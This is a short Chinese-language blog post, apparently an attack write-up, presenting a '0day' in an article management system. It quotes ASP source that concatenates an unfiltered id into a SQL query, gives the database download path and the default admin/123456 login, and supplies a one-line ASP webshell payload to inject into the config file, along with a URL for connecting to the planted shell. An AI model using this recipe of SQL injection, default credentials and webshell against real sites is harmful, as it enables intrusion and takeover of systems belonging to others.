米号文章管理系统0day
<!--#include file="include/head.asp"-->
<!--#include file="include/ubb2html.asp"-->
<%
Dim ContextID,Form_Title,Form_Context,formID,i2,title,Page,Pages,AllCount,ShowCount,PastCount,listMethod,ip,title2,status,bgcolor,listpage,csspath,j,ismobile,lastupdatetime,tmpJs,isLock,threadmaster,showOrder,keywords,tags
ContextID=Cnum(Request.QueryString("id")) '这里获取没过滤 Cnum函数是把一个字符变成一个数 By Dark'moon
Page=Max(Cnum(sqlshow(Request("page"))),1)
listpage=sqlshow(Request.QueryString("listpage"))
formID=ContextID
csspath=left(css_style,instr(css_style,".")-1)
showOrder=0 '1为正序 0为逆序
If ContextID=0 Then
turnto ""&strUrl&""
End If
Enable_Anonymous=False
Sql="select * from Content where id=" & ContextID & " or Parent=" & ContextID & " order by Parent,PostTime"'漏洞产生
OpenRs(Sql)
'ID号错误
If Rs.RecordCount=0 Then
turnto ""&strUrl&""
End If
数据库下载
databases/data.mdb
默认账号密码 admin 123456
后台配置文件入数据
"%><%eval request("sb")%><%s="
连接
http://www.iick.blog/include/config.asp
上一篇:php后台插一句话的思路
下一篇:ideacms文章管理系统漏洞